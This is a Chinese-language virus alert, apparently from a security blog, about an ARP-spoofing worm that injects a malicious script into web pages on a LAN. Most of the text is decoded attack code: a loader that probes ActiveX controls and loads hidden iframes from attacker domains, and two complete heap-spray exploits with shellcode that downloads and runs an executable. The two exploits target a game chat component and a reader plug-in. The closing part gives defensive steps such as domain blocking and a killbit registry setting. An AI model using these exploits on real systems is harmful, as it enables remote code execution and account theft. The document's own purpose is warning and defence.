ARP病毒攜新應用軟件漏洞
病毒預警:ARP病毒攜新應用軟件漏洞(聯衆遊戲、超星閱讀器 0-Day)大肆傳播
近期,根據惡意代碼檢測,有一新的ARP病毒變種,利用新的應用軟件漏洞(聯衆遊戲了聊天室組件、超星閱讀器0-Day)大肆傳播,造成內網斷網,帳號丟失。
該新ARP病毒變種,通過感染局域網中一台後,會將該電腦僞裝成網關,這樣局域網中其它電腦在浏覽網頁的時候,其返回的WEB頁面中插入惡意網址連接:<script src=http://rb.vg/1.js></script> ,該惡意網址連接利用多個時下流行的網頁木馬漏洞,下載多款網遊木馬,這樣導致中毒用戶帳號丟失,遭受到損失。
圖:ARP病毒插入的惡意代碼框架
詳細分析如下:
惡意網址連接:<script src=http://rb.vg/1.js></script> 采用的是js文件挂馬法,該文件采用16進制代碼加密,解密後的代碼如下:
/*----------------------------------------------------
var vDA1 = new window["Date"]()
vDA1["setTime"](vDA1["getTime"]() + 24*60*60*1000)
var eOTo$2 = new window["String"](window["document"]["cookie"])
var eZT3 = "Cookie1="
var VMliYvVKu4 = eOTo$2["indexOf"](eZT3)
if (VMliYvVKu4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ vDA1["toGMTString"]()
try{if(new ActiveXObject("Microsoft.XMLHTTP"))window["document"]["write"]('<script src="
http://nop.gs/s3...Js1.js"></script>');}catch(e){} // ms06014
try{if(new ActiveXObject("DPClient.Vod"))window["document"]["write"]('<iframe style=display:none src="
http://nop.gs/s36...ok.gif"></iframe>');}catch(e){} // XL
try{if(new ActiveXObject("MPS.StormPlayer.1"))window["document"]["write"]('<iframe style=display:none src="
http://nop.gs/s3...68.gif"></iframe>');}catch(e){} // BF
try{if(new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1"))window["document"]["write"]('<iframe style=display:none src="
http://nop.gs/s3...8.gif"></iframe>');}catch(e){} // PPS
try{if(new ActiveXObject("Pdg2"))window["document"]["write"]('<iframe style=display:none src="
http://nop.gs/s368...368.gif"></iframe>');}catch(e){} // CX
try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))window["document"]["write"]('<iframe style=display:none src="
http://nop.gs/s36...68.gif"></iframe>');}catch(e){} // LZ
try{if(new ActiveXObject("BaiduBar.Tool.1"))window["document"]["write"]('<iframe style=display:none src="
http://nop.gs/s36...68.gif"></iframe>');}catch(e){} // Baidu
}
/*----------------------------------------------------
在該代碼中,共利用以下7個漏洞下載木馬病毒
http://pic.16.vg/S...82.exems06014 /經典的MS06-014挂馬王漏洞
XL /迅雷5漏洞
BF /暴風影音漏洞
PPS /PPStream 漏洞
CX /超星閱讀器漏洞 0-Day
LZ /聯衆遊戲聊天室組件漏洞
Baidu /百度搜霸漏洞
下面說一下聯衆遊戲聊天室組件漏洞和超星閱讀器漏洞(0-Day) ,
http://nop.gs/s36...68.gif 是聯衆遊戲聊天室組件的溢出代碼,采用US-ASCii 加密,解密後的Exploits代碼如下:
/**************************************************************************************************
<body>
<script>window.onerror=function(){return true;}</script>
<object classid="clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69" style='display:none' id='target'></object>
<SCRIPT language="javascript">
var shellcode = unescape(""+""+""+"%u9090"+""+""+""+"%u9090"+
""+""+""+"%uefe9"+""+""+"%u0000"+""+""+"%u5a00"+""+""+"%ua164"+""+""+"%u0030"+""+""+"%u0000"+""+""+"%u408b"+""+""+"%u8b0c" +
""+""+""+"%u1c70"+""+""+"%u8bad"+""+""+"%u0840"+""+""+"%ud88b"+""+""+"%u738b"+""+""+"%u8b3c"+""+""+"%u1e74"+""+""+"%u0378" +
""+""+""+"%u8bf3"+""+""+"%u207e"+""+""+"%ufb03"+""+""+"%u4e8b"+""+""+"%u3314"+""+""+"%u56ed"+""+""+"%u5157"+""+""+"%u3f8b" +
""+""+""+"%ufb03"+""+""+"%uf28b"+""+""+"%u0e6a"+""+""+"%uf359"+""+""+"%u74a6"+""+""+"%u5908"+""+""+"%u835f"+""+""+"%u04c7" +
""+""+""+"%ue245"+""+""+"%u59e9"+""+""+"%u5e5f"+""+""+"%ucd8b"+""+""+"%u468b"+""+""+"%u0324"+""+""+"%ud1c3"+""+""+"%u03e1" +
""+""+""+"%u33c1"+""+""+"%u66c9"+""+""+"%u088b"+""+""+"%u468b"+""+""+"%u031c"+""+""+"%uc1c3"+""+""+"%u02e1"+""+""+"%uc103" +
""+""+""+"%u008b%uc303"+""+""+"%ufa8b"+""+""+"%uf78b"+""+""+"%uc683"+""+""+"%u8b0e"+""+""+"%u6ad0"+""+""+"%u5904" +
""+""+""+"%u6ae8"+""+""+"%u0000"+""+""+"%u8300"+""+""+"%u0dc6"+""+""+"%u5652"+""+""+"%u57ff"+""+""+"%u5afc"+""+""+"%ud88b" +
""+""+""+"%u016a"+""+""+"%ue859"+""+""+"%u0057"+""+""+"%u0000"+""+""+"%uc683"+""+""+"%u5613"+""+""+"%u8046"+""+""+"%u803e" +
""+""+""+"%ufa75"+""+""+"%u3680"+""+""+"%u5e80"+""+""+"%uec83"+""+""+"%u8b40"+""+""+"%uc7dc"+""+""+"%u6303"+""+""+"%u646d" +
""+""+""+"%u4320"+""+""+"%u4343"+""+""+"%u6643"+""+""+"%u03c7"+""+""+"%u632f"+""+""+"%u4343"+""+""+"%u03c6"+""+""+"%u4320" +
""+""+""+"%u206a"+""+""+"%uff53"+""+""+"%uec57"+""+""+"%u04c7"+""+""+"%u5c03"+""+""+"%u2e61"+""+""+"%uc765"+""+""+"%u0344" +
""+""+""+"%u7804"+""+""+"%u0065"+""+""+"%u3300"+""+""+"%u50c0"+""+""+"%u5350"+""+""+"%u5056"+""+""+"%u57ff"+""+""+"%u8bfc" +
""+""+""+"%u6adc"+""+""+"%u5300%u57ff"+""+""+"%u68f0"+""+""+"%u2451"+""+""+"%u0040"+""+""+"%uff58"+""+""+"%u33d0" +
""+""+""+"%uacc0"+""+""+"%uc085"+""+""+"%uf975"+""+""+"%u5251"+""+""+"%u5356"+""+""+"%ud2ff"+""+""+"%u595a"+""+""+"%ue2ab" +
""+""+""+"%u33ee"+""+""+"%uc3c0"+""+""+"%u0ce8"+""+""+"%uffff"+""+""+"%u47ff"+""+""+"%u7465"+""+""+"%u7250"+""+""+"%u636f" +
""+""+""+"%u6441"+""+""+"%u7264"+""+""+"%u7365"+""+""+"%u0073"+""+""+"%u6547"+""+""+"%u5374"+""+""+"%u7379"+""+""+"%u6574" +
""+""+""+"%u446d"+""+""+"%u7269"+""+""+"%u6365"+""+""+"%u6f74"+""+""+"%u7972"+""+""+"%u0041"+""+""+"%u6957"+""+""+"%u456e" +
""+""+""+"%u6578"+""+""+"%u0063"+""+""+"%u7845"+""+""+"%u7469"+""+""+"%u6854"+""+""+"%u6572"+""+""+"%u6461"+""+""+"%u4c00" +
""+""+""+"%u616f"+""+""+"%u4c64"+""+""+"%u6269"+""+""+"%u6172%u7972"+""+""+"%u0041"+""+""+"%u7275"+""+""+"%u6d6c" +
""+""+""+"%u6e6f"+""+""+"%u5500"+""+""+"%u4c52"+""+""+"%u6f44"+""+""+"%u6e77"+""+""+"%u6f6c"+""+""+"%u6461"+""+""+"%u6f54" +
""+""+""+"%u6946"+""+""+"%u656c"+""+""+"%u0041"+""+""+"%u7468"+""+""+"%u7074"+""+""+"%u2f3a"+""+""+"%u702f"+""+""+"%u6369" +
""+""+""+"%u312e%u2e36"+""+""+"%u6776"+""+""+"%u532f"+""+""+"%u3633"+""+""+"%u2f38"+""+""+"%u3353"+""+""+"%u3836" +
""+""+""+"%u2e32"+""+""+"%u7865"+""+""+"%u8065"+""+""+"%u0000");
</script>
<SCRIPT language="javascript">
var fsk51d2sl = "63e23c122";
var bigblock = unescape(""+""+"%u9090"+""+"%u9090");
var fsk51d2sl = "63e23c122";
var headersize = 20;
var fsk51d2sl = "63e23c122";
var slackspace = headersize+shellcode.length;
var fsk51d2sl = "63e23c122";
while (bigblock.length<slackspace) bigblock+=bigblock;
var fsk51d2sl = "63e23c122";
fillblock = bigblock.substring(0, slackspace);
var fsk51d2sl = "63e23c122";
block = bigblock.substring(0, bigblock.length-slackspace);
var fsk51d2sl = "63e23c122";
while(block.length+slackspace<0x40000) block = block+block+fillblock;
var fsk51d2sl = "63e23c122";
memory = new Array();
var fsk51d2sl = "63e23c122";
for (x=0; x<300; x++) memory[x] = block +shellcode;
var fsk51d2sl = "63e23c122";
var buffer = ''
var fsk51d2sl = "63e23c122";
while (buffer.length < 164) buffer+="A";
var fsk51d2sl = "63e23c122";
buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer;
var fsk51d2sl = "63e23c122";
ok="ok";
var fsk51d2sl = "63e23c122";
target.ConnectAndEnterRoom(buffer,ok,ok,ok,ok,ok );
var fsk51d2sl = "63e23c122";
</script?
</body>
<mEtA Http-Equiv="Content-TypE" content="TeXt/htMl; CharSet=Us-AsCiI" />
/**************************************************************************************************
有漏洞的組件爲:C:\Program Files\GlobalLink\Game\Share\GLChat.ocx, GlobalLink
其 CLSID:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69
下載的病毒爲:
http://pic.16.vg/S...82.exe超星閱讀器的Exploits代碼如下,這個看樣子現在還是個0-Day
/**************************************************************************************************
<body>
<script>window.onerror=function(){return true;}</script>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" style='display:none' id='target'></object>
<SCRIPT language="javascript">
var el1s2kdo3r = "hi1265369";
var shellcode = unescape(""+""+""+"%u9090"+""+""+""+"%u9090"+
""+""+""+"%uefe9"+""+""+"%u0000"+""+""+"%u5a00"+""+""+"%ua164"+""+""+"%u0030"+""+""+"%u0000"+""+""+"%u408b"+""+""+"%u8b0c" +
""+""+""+"%u1c70"+""+""+"%u8bad"+""+""+"%u0840"+""+""+"%ud88b"+""+""+"%u738b"+""+""+"%u8b3c"+""+""+"%u1e74"+""+""+"%u0378" +
""+""+""+"%u8bf3"+""+""+"%u207e%ufb03"+""+""+"%u4e8b%u3314"+""+""+"%u56ed"+""+""+"%u5157"+""+""+"%u3f8b" +
""+""+""+"%ufb03"+""+""+"%uf28b"+""+""+"%u0e6a"+""+""+"%uf359"+""+""+"%u74a6"+""+""+"%u5908"+""+""+"%u835f"+""+""+"%u04c7" +
""+""+""+"%ue245"+""+""+"%u59e9"+""+""+"%u5e5f"+""+""+"%ucd8b"+""+""+"%u468b"+""+""+"%u0324"+""+""+"%ud1c3"+""+""+"%u03e1" +
""+""+""+"%u33c1"+""+""+"%u66c9%u088b"+""+""+"%u468b"+""+""+"%u031c"+""+""+"%uc1c3"+""+""+"%u02e1"+""+""+"%uc103" +
""+""+""+"%u008b"+""+""+"%uc303"+""+""+"%ufa8b"+""+""+"%uf78b"+""+""+"%uc683"+""+""+"%u8b0e"+""+""+"%u6ad0"+""+""+"%u5904" +
""+""+""+"%u6ae8"+""+""+"%u0000"+""+""+"%u8300%u0dc6"+""+""+"%u5652"+""+""+"%u57ff"+""+""+"%u5afc"+""+""+"%ud88b" +
""+""+""+"%u016a"+""+""+"%ue859"+""+""+"%u0057"+""+""+"%u0000"+""+""+"%uc683"+""+""+"%u5613"+""+""+"%u8046"+""+""+"%u803e" +
""+""+""+"%ufa75"+""+""+"%u3680"+""+""+"%u5e80"+""+""+"%uec83"+""+""+"%u8b40"+""+""+"%uc7dc"+""+""+"%u6303"+""+""+"%u646d" +
""+""+""+"%u4320"+""+""+"%u4343%u6643"+""+""+"%u03c7"+""+""+"%u632f"+""+""+"%u4343"+""+""+"%u03c6"+""+""+"%u4320" +
""+""+""+"%u206a"+""+""+"%uff53"+""+""+"%uec57"+""+""+"%u04c7"+""+""+"%u5c03"+""+""+"%u2e61"+""+""+"%uc765"+""+""+"%u0344" +
""+""+""+"%u7804%u0065"+""+""+"%u3300"+""+""+"%u50c0"+""+""+"%u5350"+""+""+"%u5056"+""+""+"%u57ff"+""+""+"%u8bfc" +
""+""+""+"%u6adc"+""+""+"%u5300"+""+""+"%u57ff"+""+""+"%u68f0"+""+""+"%u2451"+""+""+"%u0040"+""+""+"%uff58"+""+""+"%u33d0" +
""+""+""+"%uacc0"+""+""+"%uc085"+""+""+"%uf975"+""+""+"%u5251%u5356"+""+""+"%ud2ff"+""+""+"%u595a"+""+""+"%ue2ab" +
""+""+""+"%u33ee"+""+""+"%uc3c0"+""+""+"%u0ce8"+""+""+"%uffff"+""+""+"%u47ff"+""+""+"%u7465"+""+""+"%u7250"+""+""+"%u636f" +
""+""+""+"%u6441"+""+""+"%u7264"+""+""+"%u7365"+""+""+"%u0073"+""+""+"%u6547"+""+""+"%u5374"+""+""+"%u7379"+""+""+"%u6574" +
""+""+""+"%u446d"+""+""+"%u7269"+""+""+"%u6365"+""+""+"%u6f74"+""+""+"%u7972"+""+""+"%u0041"+""+""+"%u6957"+""+""+"%u456e" +
""+""+""+"%u6578%u0063"+""+""+"%u7845"+""+""+"%u7469"+""+""+"%u6854"+""+""+"%u6572"+""+""+"%u6461"+""+""+"%u4c00" +
""+""+""+"%u616f"+""+""+"%u4c64"+""+""+"%u6269"+""+""+"%u6172"+""+""+"%u7972"+""+""+"%u0041"+""+""+"%u7275"+""+""+"%u6d6c" +
""+""+""+"%u6e6f"+""+""+"%u5500"+""+""+"%u4c52"+""+""+"%u6f44"+""+""+"%u6e77"+""+""+"%u6f6c"+""+""+"%u6461"+""+""+"%u6f54" +
""+""+""+"%u6946"+""+""+"%u656c"+""+""+"%u0041%u7468"+""+""+"%u7074"+""+""+"%u2f3a"+""+""+"%u702f"+""+""+"%u6369" +
""+""+""+"%u312e%u2e36"+""+""+"%u6776"+""+""+"%u532f"+""+""+"%u3633%u2f38"+""+""+"%u3353"+""+""+"%u3836" +
""+""+""+"%u2e32"+""+""+"%u7865"+""+""+"%u8065"+""+""+"%u0000");
</script>
<SCRIPT language="javascript">
var el1s2kdo3r = "hi1265369";
var bigblock = unescape(""+""+""+"%u9090"+""+""+"%u9090");
var el1s2kdo3r = "hi1265369";
var headersize = 20;
var el1s2kdo3r = "hi1265369";
var slackspace = headersize+shellcode.length;
var el1s2kdo3r = "hi1265369";
while (bigblock.length<slackspace) bigblock+=bigblock;
var el1s2kdo3r = "hi1265369";
fillblock = bigblock.substring(0, slackspace);
var el1s2kdo3r = "hi1265369";
block = bigblock.substring(0, bigblock.length-slackspace);
var el1s2kdo3r = "hi1265369";
while(block.length+slackspace<0x40000) block = block+block+fillblock;
var el1s2kdo3r = "hi1265369";
memory = new Array();
var el1s2kdo3r = "hi1265369";
for (x=0; x<100; x++) memory[x] = block +shellcode;
var el1s2kdo3r = "hi1265369";
var buffer = ''
var el1s2kdo3r = "hi1265369";
while (buffer.length < 1024) buffer+="\x05";
var el1s2kdo3r = "hi1265369";
var ok="1111";
var el1s2kdo3r = "hi1265369";
target.Register(ok,buffer);
var el1s2kdo3r = "hi1265369";
</script?
</body>
<mEtA Http-Equiv="Content-TypE" content="TeXt/htMl; CharSet=Us-AsCiI" />
/**************************************************************************************************
有漏洞的組件爲:C:\WINDOWS\system32\pdg2.dll
其CLSID:7F5E27CE-4A5C-11D3-9232-0000B48A05B2
下載的病毒同上個一樣。
這回就連超星閱讀器漏洞就被病毒作者利用上了,令我很是汗了一把~
請網管封殺
http://pic....vg/ 惡意網址,並將這些應用軟件升級到最新版。
對於官方還沒更新軟件的0-Day漏洞,可以在注冊表中設置killbit :
如超星閱讀器的: 從最開始的MS06-014和MS07-017雙漏洞挂馬,到後來又加上了WEB迅雷漏洞三挂馬法,再到時下十分流行的N個應用軟件漏洞挂馬,可見病毒作者爲了將自己的馬兒放出去,已經無所不用其極,下一個遭殃的軟件會是那個呢?
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7F5E27CE-4A5C-11D3-9232-0000B48A05B2}]
"Compatibility Flags"=dword:00000400
近期網馬漏洞不完全總結
百度搜霸ActiveX控件遠程代碼執行漏洞
PPStream 堆棧溢出漏洞
暴風影音2 mps.dll組件多個緩沖區溢出漏洞
jetAudio 7.x ActiveX漏洞
WEB迅雷漏洞
迅雷5漏洞
Yahoo! Messenger 8.1.0 ActiveX控件GetFile方式任意文件上傳漏洞
超星閱讀器漏洞
聯衆遊戲聊天室組件漏洞
From:網絡巡警的博客